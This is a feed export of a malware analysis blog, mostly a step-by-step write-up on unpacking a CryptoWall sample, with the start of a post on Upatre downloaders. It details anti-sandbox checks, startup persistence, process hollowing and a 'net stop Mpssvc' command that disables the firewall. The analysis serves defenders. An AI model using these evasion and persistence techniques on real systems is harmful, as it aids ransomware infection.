<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAL3DKop2UkGy8fU0z1td1OWsEoQm0FYZPIPU3Q_55QMxL21p0wFGiaxrb4rrSkjScz-OfnBNxhRdk5TRIbm_pnJ4hGCoimuycLbAqQsMajpU3kdhT5jiY-kF-O7eiWLL-nsp3ARjIYs/s1600/pirate4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAL3DKop2UkGy8fU0z1td1OWsEoQm0FYZPIPU3Q_55QMxL21p0wFGiaxrb4rrSkjScz-OfnBNxhRdk5TRIbm_pnJ4hGCoimuycLbAqQsMajpU3kdhT5jiY-kF-O7eiWLL-nsp3ARjIYs/s400/pirate4.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">Going to the link where the password is redirects to this site.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNP7vLCsEYkrts-4dAFse7CefPXKmHYs6AxDfrYqWqNRAGKQXMGtADmhz0J7NQSif73FzX1i2N3viqa2tpwR-dK03N1WOJP1tTbdN6ZXPtKP4dGAO9RSqGv-Q8S-9zLs0A6Yl9gxTkcqE/s1600/pirate5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNP7vLCsEYkrts-4dAFse7CefPXKmHYs6AxDfrYqWqNRAGKQXMGtADmhz0J7NQSif73FzX1i2N3viqa2tpwR-dK03N1WOJP1tTbdN6ZXPtKP4dGAO9RSqGv-Q8S-9zLs0A6Yl9gxTkcqE/s400/pirate5.png" width="400" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">A very obvious scam. Didn't bother continuing to all that scam process.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span>
Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-1227934427004236933.post-73881127901150213902015-03-30T02:37:00.000-07:002015-03-30T02:37:21.238-07:00Unpacking MFC Compiled CryptoWall Malware<h2 style="text-align: left;">
Unpacking MFC Compiled CryptoWall Malware</h2>
<h4 style="text-align: left;">
Introduction</h4>
<div style="text-align: left;">
First and foremost, this article does not intend to analyze what CryptoWall malwares are (since many malware researchers did that already) but instead this analysis is focused on unpacking MFC compiled cryptowall.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
You can also download this MFC tutorial by Externalist on this site https://tuts4you.com/download.php?view.2509 for additional references.<br />
<br />
I used IDA Pro and Ollydbg hand in hand when debugging to get a better overview of the malware when unpacking.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<h4 style="text-align: left;">
What is MFC?</h4>
<div style="text-align: left;">
MFC or Microsoft Foundation Class is a collection of classes most commonly used in object oriented programming. Think of MFC as a wrapper for windows API that are written in C++.</div>
<div style="text-align: left;">
<br /></div>
<h4 style="text-align: left;">
So, why MFC?</h4>
<div style="text-align: left;">
Since MFC are wrapped windows API, the commonly known windows API to us malware researchers are now hidden inside a MFC library making static analysis on malwares such as cryptowall quite difficult.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Here is what the imports of a MFC compiled file looks like:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbIHpq39J2W-ao-PvGx7z3nl6nSRPg5nLD8gyfyB4W8kK83sco5bsQ97AtFctKoJmX07WAyC_BPJ6MSFppSswVZVnbnEpQA2blTvMUw2jvHfUhl9JPuAzUp4t3w89jD61_LX6mJ8vG/s1600/MFC_imports.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbIHpq39J2W-ao-PvGx7z3nl6nSRPg5nLD8gyfyB4W8kK83sco5bsQ97AtFctKoJmX07WAyC_BPJ6MSFppSswVZVnbnEpQA2blTvMUw2jvHfUhl9JPuAzUp4t3w89jD61_LX6mJ8vG/s1600/MFC_imports.png" height="320" width="227" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<i>Imports of MFC42.DLL</i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Woah!! No string names at all? Only ordinals? Don't fret, we can still continue to analyze this file.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
If you have IDA Pro installed, it will automatically load the corresponding library for you making the import names for MFC42.dll visible.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpaGg3ZBhFhURXJ2OuIyEFKRkzsglNertG_8lv_7ovtusqGLmBxClWGi1m_SR9CEd5i2jxiqFNuCaRrXZwidSl79Oi6Tdh-Jss7kxR7jxoqmv1QybjtLYfjwK4Oe2KUvM_3g6tULza/s1600/ida_mfc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpaGg3ZBhFhURXJ2OuIyEFKRkzsglNertG_8lv_7ovtusqGLmBxClWGi1m_SR9CEd5i2jxiqFNuCaRrXZwidSl79Oi6Tdh-Jss7kxR7jxoqmv1QybjtLYfjwK4Oe2KUvM_3g6tULza/s1600/ida_mfc.png" height="189" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<h4 style="text-align: left;">
Let's begin..</h4>
<div style="text-align: left;">
First, lets take a look at the WINMAIN of our sample (<i>9DB8BE981E9CDFCB583030E0057345AB</i>)</div>
<div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvFBfA3O7a9dLMI5W4hggbANkAtaGhMeqKqREqJ9IUEr_JEh00G_KfFK04rHA428JHRV_2s__zO-UMfnPgdd6yHPHLbpD_lPYyW0vobQF_o6D16pKi_mkKbwLbBF17KKId5Q7YWSBO/s1600/mfcwinmain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvFBfA3O7a9dLMI5W4hggbANkAtaGhMeqKqREqJ9IUEr_JEh00G_KfFK04rHA428JHRV_2s__zO-UMfnPgdd6yHPHLbpD_lPYyW0vobQF_o6D16pKi_mkKbwLbBF17KKId5Q7YWSBO/s1600/mfcwinmain.png" height="133" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Following the MFC call instruction leads us to a dead-end. So what now?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Based from experience, I know that packed malwares will attempt to reconstruct it's import API from kernel32.dll at some point. So from there, lets load it in OllyDbg and put a breakpoint in LoadLibraryA. Press F9 (run) a couple of times until a familiar "kernel32.dll" string with an address within the scope of our file is visible in stack.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZdLGHgubRUM_vw7bOHu2_Ois-kQBwfiyOWdNY9zYdzdHQOu9t9uAhmJJ1t7-zfGuGhl3VpPglKWqlR30w21dHgm2FHfn265N_UOOcsGykFLaSDwqVMRqN0se_djH2MfEuUlL6uoA_/s1600/kernel32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZdLGHgubRUM_vw7bOHu2_Ois-kQBwfiyOWdNY9zYdzdHQOu9t9uAhmJJ1t7-zfGuGhl3VpPglKWqlR30w21dHgm2FHfn265N_UOOcsGykFLaSDwqVMRqN0se_djH2MfEuUlL6uoA_/s1600/kernel32.png" height="155" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Press Alt+F9 to return to user code, then trace from there and let's look for a decryption routine.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I found the decryption routine at </div>
<blockquote class="tr_bq">
<span style="background-color: white;"><span style="color: blue;"><i>.text:00401370 push esi ;<br />.text:00401371 mov esi, ecx<br />.text:00401373 call READ_TO_MEM ;<br />.text:00401378 push 54638<br />.text:0040137D mov ecx, esi<br /><b>.text:0040137F call DECRYPT_FUNC</b></i></span></span></blockquote>
<div class="separator" style="clear: both; text-align: left;">
where it will first read a portion of itself to higher memory (<i>Function@00401373</i>) then proceed to decrypt a size of 0x434Ah.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh87o-T5WMJ2jGzDOAJYLwCaOgC8oALqlcbDwIoKHTxNQkfXffReGoUDTvRNYXqQ_Z3edhgJaldlbgZkenNu_Q01qiS4d41wHQaxlvOnt0TLFNYwpMClgCaUPO4lGJhvRqZmvTmBrAw/s1600/decrypted1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh87o-T5WMJ2jGzDOAJYLwCaOgC8oALqlcbDwIoKHTxNQkfXffReGoUDTvRNYXqQ_Z3edhgJaldlbgZkenNu_Q01qiS4d41wHQaxlvOnt0TLFNYwpMClgCaUPO4lGJhvRqZmvTmBrAw/s1600/decrypted1.png" height="279" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Take note of the memory location because execution will be transferred from there.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In this case, the memory location is 00980228 and lets call this UNPACKED01 Function.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAdAZkMNPG5fj12xGl8FsGxjVdZpo2Td8ONqTP7cRWH92EC1guGUS-x0HNM5VoiiQ4UHPikbkJJZv1S8dKxt97HULsF0Jums7qIzrUqp-xLIkxsg-2lNTay9zpY85QC3lxubrBsu_Y/s1600/unpacked01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAdAZkMNPG5fj12xGl8FsGxjVdZpo2Td8ONqTP7cRWH92EC1guGUS-x0HNM5VoiiQ4UHPikbkJJZv1S8dKxt97HULsF0Jums7qIzrUqp-xLIkxsg-2lNTay9zpY85QC3lxubrBsu_Y/s1600/unpacked01.png" height="105" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Typical to packers is that they will always attempt to rebuild their Import Address Table by preparing the windows API strings to be used together with using LoadLibrary and GetProcAddress combo.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In this example, the packer prepares its strings directly in stack as a way of obfuscation making it not readily visible to the naked eye of the researcher.</div>
<blockquote class="tr_bq">
<i><span style="color: blue;">debug029:0098047F mov byte ptr [ebp-20h], 'k'<br />debug029:00980483 mov byte ptr [ebp-1Fh], 'e'<br />debug029:00980487 mov byte ptr [ebp-1Eh], 'r'<br />debug029:0098048B mov byte ptr [ebp-1Dh], 'n'<br />debug029:0098048F mov byte ptr [ebp-1Ch], 'e'<br />debug029:00980493 mov byte ptr [ebp-1Bh], 'l'<br />debug029:00980497 mov byte ptr [ebp-1Ah], '3'<br />debug029:0098049B mov byte ptr [ebp-19h], '2'<br />debug029:0098049F mov byte ptr [ebp-18h], '.'<br />debug029:009804A3 mov byte ptr [ebp-17h], 'd'<br />debug029:009804A7 mov byte ptr [ebp-16h], 'l'<br />debug029:009804AB mov byte ptr [ebp-15h], 'l'<br />debug029:009804AF mov [ebp-14h], bl<br />debug029:009804B2 mov byte ptr [ebp-0A0h], 'G'<br />debug029:009804B9 mov byte ptr [ebp-9Fh], 'e'<br />debug029:009804C0 mov byte ptr [ebp-9Eh], 't'<br />debug029:009804C7 mov byte ptr [ebp-9Dh], 'M'<br />debug029:009804CE mov byte ptr [ebp-9Ch], 'o'<br />debug029:009804D5 mov byte ptr [ebp-9Bh], 'd'<br />debug029:009804DC mov byte ptr [ebp-9Ah], 'u'<br />debug029:009804E3 mov byte ptr [ebp-99h], 'l'<br />debug029:009804EA mov byte ptr [ebp-98h], 'e'<br />debug029:009804F1 mov byte ptr [ebp-97h], 'F'<br />debug029:009804F8 mov byte ptr [ebp-96h], 'i'<br />debug029:009804FF mov byte ptr [ebp-95h], 'l'<br />debug029:00980506 mov byte ptr [ebp-94h], 'e'<br />debug029:0098050D mov byte ptr [ebp-93h], 'N'<br />debug029:00980514 mov byte ptr [ebp-92h], 'a'<br />debug029:0098051B mov byte ptr [ebp-91h], 'm'<br />debug029:00980522 mov byte ptr [ebp-90h], 'e'<br />debug029:00980529 mov byte ptr [ebp-8Fh], 'W'<br />debug029:00980530 mov [ebp-8Eh], bl</span></i> </blockquote>
List of strings used is listed below.<br />
<br />
<ul>
<li>kernel32.dll</li>
<li>GetModuleFileNameW</li>
<li>CreateFileA</li>
<li>VirtualAlloc</li>
<li>GetFileSize</li>
<li>ReadFile</li>
<li>CloseHandle</li>
<li>myapp.exe</li>
<li>GetSystemDirectoryA</li>
<li>explorer.exe</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: left;">
It then traverses the values of LoadLibraryA and GetProcAddress in kernel32.dll. An interesting note here is that you will never see a string "LoadLibraryA" or "GetProcAddress" assembled in stack or somewhere in memory. This is because, the packer used its <b>own hashing algorithm</b> where the string hashes of LoadLibraryA, GetProcAddress and kernel32.dll are already precomputed.</div>
<blockquote class="tr_bq">
<span style="color: blue;"><i>debug029:00980263 nop<br />debug029:00980264 push 0D5786h ; hash of "LoadLibraryA"<br />debug029:00980269 push 0D4E88h ; hash of "kernel32.dll"<br /><b>debug029:0098026E call UNHASHER</b><br /><b>debug029:00980273 mov [ebp-4], eax ; EAX = kernel32.dll:kernel32_LoadLibraryA</b><br />debug029:00980276 push 348BFAh ; hash of "GetProcAddress"<br />debug029:0098027B push 0D4E88h </i></span><i style="color: blue;">; hash of "kernel32.dll"</i><span style="color: blue;"><i><br /><b>debug029:00980280 call UNHASHER</b><br /><b>debug029:00980285 mov [ebp-8], eax ; EAX = kernel32.dll:kernel32_GetProcAddress</b></i></span></blockquote>
It will then check the existence of the file "%systemdrive%:\myapp.exe" (C:\myapp.exe) or "%windir%\explorer.exe.\" (C:\Windows\explorer.exe.\). If either exists, the malware will go into an infinite loop and system infection will be bypassed. Also, you may see a 100% CPU utilization by the malware process. Malware code authors may have used this function in order to not get their own system infected when writing/testing codes.<br />
<br />
This function may have been copied over from a known malware family called <b>"<i>Soraya"</i> </b>in which the malware terminates and discontinue system infection when the file C:\myapp.exe exists. But in this case instead of terminating, it goes into an infinite loop.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
It will then allocate another memory location using VirtualAlloc, copies itself yet again to the allocated memory, and then looks for a <b>dword marker</b> in order to know which offset it will start decrypting.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The dword marker is known to be <b>0xA2658111 </b>in this sample.</div>
<blockquote class="tr_bq">
<i><span style="color: blue;">009809AA C685 34FFFFFF A2 MOV BYTE PTR SS:[EBP-CC],<b>0A2</b><br />009809B1 C685 35FFFFFF 65 MOV BYTE PTR SS:[EBP-CB],<b>65</b><br />009809B8 C685 36FFFFFF 81 MOV BYTE PTR SS:[EBP-CA],<b>81</b><br />009809BF C685 37FFFFFF 11 MOV BYTE PTR SS:[EBP-C9],<b>11</b></span></i></blockquote>
<br />
Once found, it will decrypt 0x3AACh bytes starting at +0x14h from the marker offset. The decrypted code will then be copied once more to a newly allocated memory space. Execution will also be transfered afterwards to the decrypted code.<br />
<br />
From here, we have successfully unpacked the <b><i>first layer</i></b> of cryptowall.<br />
<br />
<br />
<h4>
But wait, there's more...</h4>
<div>
If you think, that we are done, then you are mistaken my friend. There is one more layer to unpack in order to get to the real Cryptowall code.</div>
<div>
<br /></div>
<div>
So let's get started :)</div>
<div>
<br /></div>
<div>
Here is a preview of what the next set of codes looks like:<br />
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfoE_1wnHKgK9fBeejcsxyZERlLVnQ5RodhgNyscdaPv6WVc_zE_h9Cc1QCF8XqSiGiRnw1I4uhT8koGaDTQlcpkIClLMEXaWAoKgAcXj4m_7dRdZQAcpkeStASD4KqJSpoMNK-30G/s1600/code2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfoE_1wnHKgK9fBeejcsxyZERlLVnQ5RodhgNyscdaPv6WVc_zE_h9Cc1QCF8XqSiGiRnw1I4uhT8koGaDTQlcpkIClLMEXaWAoKgAcXj4m_7dRdZQAcpkeStASD4KqJSpoMNK-30G/s1600/code2.png" height="92" width="320" /></a></div>
<br />
CRYPTO_UNPACK2 Function has 8 options total depending on what is pushed in stack before it is called.<br />
<br />
These options are:<br />
<br />
<ul>
<li>0 = Exit process</li>
<li>1 = Unpacked compressed data to allocated memory </li>
<li>4 = Verify priviliges and create mutex "UACMut"</li>
<li>5 = Check for existence of sbiedll.dll module (Sandboxie) in running processes </li>
<li>6 = Check for existence of VBoxService.exe and vmtoolsd.exe in running processes</li>
<li>7 = Run unpacked cryptowall in memory.</li>
<li>8 = Copy itself as system.pif to %ALLUSERSPROFILE%\Start Menu\Programs\Startup and in %USERPROFILE%\Application Data with hidden and system attributes, create REGRUN entries, and can also disable firewall service</li>
<li>9 = Traverses registry to get default web browser application, also verifies iexplorer.exe if it is 32-bit, 64-bit version is skipped.</li>
</ul>
<div>
Note that there is no option 2 and 3.</div>
<div>
<br /></div>
<div>
To summarize it, the typical execution sequence for this malware is the following:</div>
<div>
<br /></div>
<blockquote class="tr_bq">
<span style="color: blue;"><i>Push 1 - Call CRYPTO_UNPACK2<br />|- Push 6 - Call CRYPTO_UNPACK2<br /> |- Push 5 - Call CRYPTO_UNPACK2<br /> |- Push 4 - Call CRYPTO_UNPACK2<br /> |- Push 8 - Call CRYPTO_UNPACK2<br /> |- Push 7 - Call CRYPTO_UNPACK2 (Spawn unpacked cryptowall as process)<br />Push 0 - Call CRYPTO_UNPACK2 (Exit Process)</i></span></blockquote>
</div>
<div>
At start of CRYPTO_UNPACK2 Function, it will reconstruct its strings and needed windows API with the same method as done previously. </div>
<div>
<br /></div>
<div>
For reference, here is the list of strings that will be populated in stack.</div>
<ul>
<li>kernel32.dll</li>
<li>shell32.dll</li>
<li>advapi32.dll</li>
<li>GetProcAddress CreateProcessA</li>
<li>CreateProcessW</li>
<li>CreateToolhelp32Snapshot</li>
<li>Process32First</li>
<li>Process32Next</li>
<li>Module32First</li>
<li>Module32Next</li>
<li>CloseHandle</li>
<li>GetCurrentProcess</li>
<li>GlobalAlloc</li>
<li>OpenProcessToken</li>
<li>GetTokenInformation</li>
<li>AllocateAndInitializeSid</li>
<li>EqualSid</li>
<li>LookupAccountSid</li>
<li>OpenMutexA</li>
<li>CreateMutexA</li>
<li>CreateFileA</li>
<li>CreateFileW</li>
<li>GetFileSize</li>
<li>ReadFile</li>
<li>GetSystemDirectoryA</li>
<li>GetSystemDirectoryW</li>
<li>SetFileAttributesW</li>
<li>SHGetSpecialFolderPathW</li>
<li>RegOpenKeyExA</li>
<li>RegOpenKeyExW</li>
<li>RegSetValueExA</li>
<li>RegSetValueExW</li>
<li>RegQueryValueExA</li>
<li>RegQueryValueExW</li>
<li>RegCloseKey</li>
<li>CreateDirectoryW</li>
<li>ExitProcess</li>
<li>Sleep</li>
<li>GetFileTime</li>
<li>SetFileTime</li>
<li>CopyFileW</li>
<li>VirtualAlloc</li>
<li>GetTickCount</li>
<li>IsWow64Process</li>
<li>OpenProcess</li>
<li>DuplicateHandle</li>
<li>NtUnmapViewOfSection</li>
<li>VirtualAllocEx</li>
<li>WriteProcessMemory</li>
<li>GetThreadContext</li>
<li>SetThreadContext</li>
<li>ResumeThread</li>
<li>VirtualProtectEx</li>
<li>TerminateProcess</li>
<li>NTReadVirtualMemory</li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
Looking back at the execution sequence posted above, <i style="color: blue;">Push 1 - Call CRYPTO_UNPACK2 </i>will decrypt more of its encrypted data not surprisingly with the same procedure done on the first layer.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
It will check (again) for a dword marker in its encrypted data in order to get the offset where to start the decryption routine. This time the <b>dword marker is 0x34E812AEh.</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<blockquote class="tr_bq">
<i><span style="color: blue;">debug031:013C2795 _looForMarker: ;<br /><b>debug031:013C2795 cmp byte ptr [ecx+edi], 34h ; Compare Two Operands</b><br />debug031:013C2799 jnz short _notMarker ; Jump if Not Zero (ZF=0)<br /><b>debug031:013C279B cmp byte ptr [ecx+edi+1], 0E8h ; Compare Two Operands</b><br />debug031:013C27A0 jnz short _notMarker ; Jump if Not Zero (ZF=0)<br /><b>debug031:013C27A2 cmp byte ptr [ecx+edi+2], 12h ; Compare Two Operands</b><br />debug031:013C27A7 jnz short _notMarker ; Jump if Not Zero (ZF=0)<br /><b>debug031:013C27A9 cmp byte ptr [ecx+edi+3], 0AEh ; Compare Two Operands</b><br />debug031:013C27AE jnz short _notMarker ; Jump if Not Zero (ZF=0)<br />debug031:013C27B0 cmp [ebp+arg_0], ebx ; Compare Two Operands<br />debug031:013C27B3 jnz short loc_13C27BD ; Jump if Not Zero (ZF=0)<br />debug031:013C27B5 lea edx, [ecx+4] ;<br />debug031:013C27BB jmp short _notMarker ; </span></i></blockquote>
When the marker is found, it will call its decryption routine to decrpyt another chunk of data.<br />
Voilà!! Its another MZ-PE file (why am I not surprised?). This new win32 file is actually the <b>REAL</b> Cryptowall malware. You can dump this in olly if you want to have a local copy of it.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJt5T45igUBCFRtbZN-SIcYsfy7W0OV40C9R_Krzt8v3QsuyRnqgQfW5npW9DYsa237O4PkQumSnCvlyPukQOAfSNZd4ZYBwhUMeu4nAns40nJtoGLjgaPP8N0oQ_EcVfpw37kuZmJ/s1600/cryptodump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJt5T45igUBCFRtbZN-SIcYsfy7W0OV40C9R_Krzt8v3QsuyRnqgQfW5npW9DYsa237O4PkQumSnCvlyPukQOAfSNZd4ZYBwhUMeu4nAns40nJtoGLjgaPP8N0oQ_EcVfpw37kuZmJ/s1600/cryptodump.png" height="231" width="320" /></a></div>
<br /></div>
<div>
It will then check if it is being run under a specific environment (sandboxie, vboxservice and vmware) and when found true will force exit its execution. (<i style="color: blue;">Push 6 - Call CRYPTO_UNPACK2, </i><i style="color: blue;">Push 5 - Call CRYPTO_UNPACK2)</i></div>
<div>
<br /></div>
<div>
It will then verify if its running with administrative privileges and create a mutex name <i style="font-weight: bold;">"UACMut"</i> when successful. (<i style="color: blue;">Push 4 - Call CRYPTO_UNPACK2)</i></div>
<div>
<br /></div>
<div>
Next, it will create a copy of itself located in %ALLUSERSPROFILE%\Start Menu\Programs\Startup\system.pif and %USERPROFILE%\Application Data with hidden and system attributes. It will also create regrun entries pointing to its copy to ensure automatic execution at windows startup.<br />
<br />
Firewall service may also be disabled from using the command line "net stop Mpssvc" (<i style="color: blue;">Push 8 - Call CRYPTO_UNPACK2)</i><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAHQAlhdSZKB9X0-UXrIk-Sr6tnUmxYfcm4LlgyM-P7d7Iv5qYuLCgsFVjknWkHUruqo3k6Pm9PZuqk1v8wpMDl1B33b-f8lu6odxrstoeJJ7RH6FpF1zuRYJ7nvRITYYckd80D-z7/s1600/firewalldisable.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAHQAlhdSZKB9X0-UXrIk-Sr6tnUmxYfcm4LlgyM-P7d7Iv5qYuLCgsFVjknWkHUruqo3k6Pm9PZuqk1v8wpMDl1B33b-f8lu6odxrstoeJJ7RH6FpF1zuRYJ7nvRITYYckd80D-z7/s1600/firewalldisable.png" height="140" width="320" /></a></div>
<br />
The newly unpacked MZ-PE file (unpacked cryptowall) will then be executed in memory by spawning a suspended process of itself but replacing all of its contents to that of the newly unpacked cryptowall using WriteProcessMemory API before finally calling ResumeThread. (<i style="color: blue;">Push 7 - Call CRYPTO_UNPACK2)</i><br />
<br />
This is where unpacking ends and the real cryptowall malware starts. You can continue analysis of the unpacked cryptowall malware if you want, but my job here is done :)<br />
<br />
<br />
<div style="text-align: right;">
Christopher D. Del Fierro</div>
</div>
Anonymoushttp://www.blogger.com/profile/10653752703445056399noreply@blogger.com5tag:blogger.com,1999:blog-1227934427004236933.post-46615837853486376552014-10-23T20:17:00.000-07:002014-10-23T20:17:01.857-07:00Upatre: .ENC File Extension<div class="MsoNormal">
Cybercriminals uses different techniques to pass through
different kinds of network intrusion defenses the users have in their system to
avoid malwares. This time criminals have found a new way to deceive users and
be able steal important information by encrypting the file and making it
unexecutable with a file extension of either “.ENC” or “.EXE”. These files are
known to be downloaded by Upatre malwares.</div>
<br />
<div class="MsoNormal">
Upatre malwares sizes are ranging from 5KB-10KB only. This malware size is noticeably small
compared to other malwares since its main role is to just download “.enc” or “.exe” files, decompress it then executes
it. In order to evade malware detection, downloaded files magic bytes are ZZP
and without the downloader the downloaded files are completely un-executable.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIxluV73GqRA9B_BWmJZPvpmVaWA509ZM1CSeSzc3SqJfi7sTg1lUBwuUK2J_6Ste6XzHu0fsKVlnysOzdNPXMs749hDyN_-rqayqhvKd49HdEYMEur9ie6VB6l1qSY7YKtDRHJ1koaHc/s1600/Upatre_image1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIxluV73GqRA9B_BWmJZPvpmVaWA509ZM1CSeSzc3SqJfi7sTg1lUBwuUK2J_6Ste6XzHu0fsKVlnysOzdNPXMs749hDyN_-rqayqhvKd49HdEYMEur9ie6VB6l1qSY7YKtDRHJ1koaHc/s1600/Upatre_image1.jpeg" height="400" width="357" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div align="center" class="MsoNormal" style="text-align: center;">
Sample of downloaded
file<o:p></o:p></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<br /></div>
<div class="MsoNormal">
The Downloader<i><o:p></o:p></i></div>
<div class="MsoNormal">
<i><span style="font-size: 9.0pt; line-height: 115%;">cef76fa7b4b30f76c7b6d2eefa30d944<o:p></o:p></span></i></div>
<div class="MsoNormal">
<i><span style="font-size: 9.0pt; line-height: 115%;"><br /></span></i></div>
<div class="MsoNormal" style="text-align: center;">
</div>
<div class="MsoNormal">
It will first check if the malware is running with its
desired filename from %TEMP% folder. If not it will create a copy of itself
with its desired filename then execute it using ShellExecuteW.</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip_zHPHAYgaCx_vd9m5Jb7l9IhYRCrVVJ5CmckVsv880gBl2OiCnbJwkA74I6Ui9DUCzFsuPGhjQ0tBBeK4lQpZKJ_Z2R-xrrPt5orwQN0EFoXqBgDH-Dr2otNu7oOzbtEdDBNFZBA4v0/s1600/Upatre_image2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip_zHPHAYgaCx_vd9m5Jb7l9IhYRCrVVJ5CmckVsv880gBl2OiCnbJwkA74I6Ui9DUCzFsuPGhjQ0tBBeK4lQpZKJ_Z2R-xrrPt5orwQN0EFoXqBgDH-Dr2otNu7oOzbtEdDBNFZBA4v0/s1600/Upatre_image2.jpeg" height="41" width="640" /></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i>Check if the existing filename is budha.exe<o:p></o:p></i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
